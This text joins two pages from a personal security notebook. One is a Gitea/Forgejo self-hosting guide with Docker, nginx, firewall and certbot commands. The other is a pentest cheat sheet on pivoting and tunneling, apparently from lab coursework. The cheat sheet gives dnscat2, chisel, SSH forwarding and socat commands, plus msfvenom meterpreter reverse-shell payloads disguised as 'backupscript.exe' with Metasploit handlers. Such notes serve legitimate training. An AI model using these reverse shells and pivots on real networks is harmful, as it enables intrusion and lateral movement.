* [Step 3: Advanced Nginx Configuration](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-3-advanced-nginx-configuration) * [Example for Gitea (nginx-gitea.conf):](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#example-for-gitea-nginx-gitea.conf) * [Step 4: Cloudflare SSL & Firewall Integration](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-4-cloudflare-ssl--firewall-integration) * [Step 5: SSL Certificates with Certbot & Renewal Automation](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-5-ssl-certificates-with-certbot--renewal-auto) * [Step 6: Important Application-Level Configuration for Gitea & Forgejo](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-6-important-application-level-configuration-f) * [Trusted Proxies](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#trusted-proxies) * [Custom Security Settings](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#custom-security-settings) * [Persistent Databases](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#persistent-databases) * [Volume Backup](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#volume-backup) * [Step 7: Monitoring and Log Management](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-7-monitoring-and-log-management) * [Logs](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#logs) * [Log Rotation](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#log-rotation) * [Automate Cloudflare IP Updates](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#automate-cloudflare-ip-updates) * [Step 8: Troubleshooting Common Issues](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-8-troubleshooting-common-issues) * [Step 9: Starting Your Deployment](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-9-starting-your-deployment) * [Summary](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#summary) Copy version: "3" services: forgejo: image: codeberg.org/forgejo/forgejo:latest container_name: forgejo environment: - USER_UID=1000 - USER_GID=1000 - FORGEJO_APP__server__ROOT_URL=https://git.yourdomain.com/ - FORGEJO_APP__server__TRUSTED_PROXIES=127.0.0.1 # Add Cloudflare IP ranges volumes: - ./forgejo-data:/data - /etc/timezone:/etc/timezone:ro - /etc/localtime:/etc/localtime:ro networks: - git-net restart: always nginx: image: nginx:latest container_name: nginx-forgejo ports: - "80:80" - "443:443" volumes: - ./nginx-forgejo.conf:/etc/nginx/conf.d/default.conf:ro - ./certs:/etc/nginx/certs:ro depends_on: - forgejo networks: - git-net restart: always networks: git-net: driver: bridge Copy server { listen 80; server_name git.yourdomain.com; return 301 https://$host$request_uri; } server { listen 443 ssl http2; server_name git.yourdomain.com; ssl_certificate /etc/nginx/certs/fullchain.pem; ssl_certificate_key /etc/nginx/certs/privkey.pem; ssl_protocols TLSv1.2 TLSv1.3; ssl_prefer_server_ciphers on; ssl_ciphers HIGH:!aNULL:!MD5; add_header X-Content-Type-Options nosniff; add_header X-Frame-Options DENY; add_header Referrer-Policy "no-referrer"; add_header Content-Security-Policy "default-src 'self';"; add_header Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" always; client_max_body_size 100M; location / { proxy_pass http://gitea:3000/; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; proxy_read_timeout 36000s; proxy_send_timeout 36000s; } location /assets/ { root /data/gitea/public/; expires max; } error_log /var/log/nginx/gitea_error.log warn; access_log /var/log/nginx/gitea_access.log combined; } Copy curl https://www.cloudflare.com/ips-v4 -o cloudflare-ips-v4.txt curl https://www.cloudflare.com/ips-v6 -o cloudflare-ips-v6.txt sudo ufw default deny incoming sudo ufw default allow outgoing sudo ufw allow 22/tcp for ip in $(cat cloudflare-ips-v4.txt); do sudo ufw allow from $ip to any port 80,443 proto tcp done for ip in $(cat cloudflare-ips-v6.txt); do sudo ufw allow from $ip to any port 80,443 proto tcp done sudo ufw enable sudo ufw reload Copy sudo apt update sudo apt install certbot python3-certbot-nginx sudo certbot --nginx -d git.yourdomain.com Copy sudo crontab -e Copy 0 3 * * * certbot renew --post-hook "docker-compose -f docker-compose-gitea.yml restart nginx" Copy tar czf gitea-backup-$(date +%F).tar.gz gitea-data/ Copy docker logs -f gitea # or for forgejo docker logs -f forgejo # For nginx docker logs -f nginx-gitea Copy docker-compose -f docker-compose-gitea.yml restart # or docker-compose -f docker-compose-forgejo.yml restart Copy docker-compose -f docker-compose-gitea.yml up -d Copy docker-compose -f docker-compose-forgejo.yml up -d --- # Pivoting, Tunneling and Forwarding | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/network-security/pivoting-tunneling-and-forwarding.md) . [](https://martian1337.gitbook.io/notes/notes/network-security/pivoting-tunneling-and-forwarding#advanced-tunneling-methods) Advanced Tunneling Methods ------------------------------------------------------------------------------------------------------------------------------------------------------------ ### [](https://martian1337.gitbook.io/notes/notes/network-security/pivoting-tunneling-and-forwarding#dns-tunneling) DNS Tunneling Copy # Start dnscat2 Server sudo ruby dnscat2.rb --dns host=,port=53,domain=inlanefreight.local --no-cache # Import Module Import-Module .\dnscat2.ps1 # Gain Connection Start-Dnscat2 -DNSserver -Domain i -PreSharedSecret -Exec cmd # Interact With Session windows -i ### [](https://martian1337.gitbook.io/notes/notes/network-security/pivoting-tunneling-and-forwarding#socks5-with-chisel) SOCKS5 With Chisel Copy # Server Side ./chisel server -v -p 1234 --socks5 # Target ./chisel client -v 10.129.202.64:1234 socks # Now we can use proxychains socks5 127.0.0.1 1080 ### [](https://martian1337.gitbook.io/notes/notes/network-security/pivoting-tunneling-and-forwarding#chisel-reverse-pivot) Chisel Reverse Pivot ### [](https://martian1337.gitbook.io/notes/notes/network-security/pivoting-tunneling-and-forwarding#rdp-and-socks-tunneling-with-sockoverrdp) RDP & Socks Tunneling with SockOverRDP * * * [](https://martian1337.gitbook.io/notes/notes/network-security/pivoting-tunneling-and-forwarding#dynamic-port-forwarding-ssh--socks) Dynamic Port Forwarding (SSH + Socks) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/notes/network-security/pivoting-tunneling-and-forwarding#local-port-forward-ssh) Local Port Forward SSH It sends the data from `` to ` Can be any port # Remote Port -> The port where the target service is listening on ssh -L :127.0.0.1: # Confirm Port Forwarding netstat -antp | grep # Forwarding Several Ports ssh -L :localhost: :localhost: @ Copy # SSH Command ssh -D 1080 @ # Check Proxychains Conf File /etc/proxychains.conf socks4 127.0.0.1 1080 Copy # Generate Reverse Shell, with the IP of the internal host. msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8080 # Set lport 8000 # set lhost 127.0.0.1 # Reverse Port Forward ssh -R :8080:0.0.0.0:8000 ubuntu@ -vN Copy # Socks4 Proxy socks 1080 # socks5 socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging # Reverse Port Forward rportfwd Copy use auxiliary/server/socks_proxy set srvport 1080 set servhost 0.0.0.0 set version 4a # Verify Proxy runs jobs Copy use post/multi/manage/autoroute set session set subnet run # Shorter Method run autoroute -s /24 Copy portfwd add -l -p -r Copy portfwd add -R -l -p -L # Setup Listener set payload windows/x64/meterpreter/reverse_tcp set lport set lhost 0.0.0.0 run # Create Payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= -f exe -o backupscript.exe LPORT= Copy plink -D 9050 ubuntu@ Copy sshuttle -r ubuntu@10.129.202.64 -v Copy # Setup Server python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 # Upload client.py to Target # On Target machine python2.7 client.py --server-ip --server-port 9999 Copy # Example: netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25 netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress= connectport=3389 connectaddress= # Verify Netsh netsh.exe interface portproxy show v4tov4 Copy # Example: socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80 socat TCP4-LISTEN:,fork TCP4:10.10.14.18: # Generate Payload msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080 # msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set lhost 0.0.0.0 set lport 80 run Copy # Example: socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443 socat TCP4-LISTEN:,fork TCP4:172.16.5.19: ---